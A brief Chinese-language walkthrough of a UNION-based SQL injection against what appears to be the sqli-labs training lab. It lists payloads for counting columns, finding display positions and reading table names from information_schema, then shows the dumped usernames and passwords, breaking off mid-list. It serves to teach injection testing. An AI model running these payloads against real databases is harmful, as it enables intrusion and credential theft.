首先判斷字段數目

Payload語句: admin‘ order by 2—s

正常顯示故字段數目大於等於2

Payload語句: admin‘ order by 3—s

顯示位置字段，結合前面的所以字段數為2

構造聯合查詢語句Payload發現顯示位

顯示位為1，2

Payload: adm‘ union select 1,2—s

註入查詢當前用戶以及當前數據庫

Payload: adm‘ union select user(),database()—s

構造語句顯示當前數據庫的所有表名:

表名：emails,referers,uagents,users

Payload: adm‘ union select group_concat(table_name),database() from information_schema.tables where table_schema=‘security‘—s

我們所需要的信息在users表中故

字段名: id,username,password

我們來查詢username，password字段的內容

Username: Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4

Password:Dumb,I-kill-you,[email protected]